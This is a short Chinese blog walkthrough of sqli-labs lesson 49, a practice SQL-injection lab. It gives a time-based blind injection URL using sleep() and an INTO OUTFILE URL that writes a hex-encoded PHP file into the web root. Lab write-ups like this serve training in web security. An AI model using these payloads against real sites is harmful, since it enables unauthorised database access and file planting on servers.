sqli-labs————Less-49

Less-49

sqli-labs————Less-49_第1张图片

本关与第47关类似,区别在于没有错误回显,但是我们还是可以使用延迟注入和导入导出文件进行注入操作:

延迟注入:

http://192.168.11.136/sqli-labs/Less-49?sort=1' and (if(ascii(left(version(),1))=5,0,sleep(5)))--+

sqli-labs————Less-49_第2张图片

into outfile注入:

http://192.168.11.136/sqli-labs/Less-49?sort=1' into outfile 'C:\\phpstudy\\WWW\\sqli-labs\\Less-49\\test.php' lines terminated  by 0x3c3f70687020706870696e666f28293b3f3e2020--+

sqli-labs————Less-49_第3张图片

sqli-labs————Less-49_第4张图片



你可能感兴趣的:(【信息安全】,【渗透测试实战1】,———Sqli-labs实战)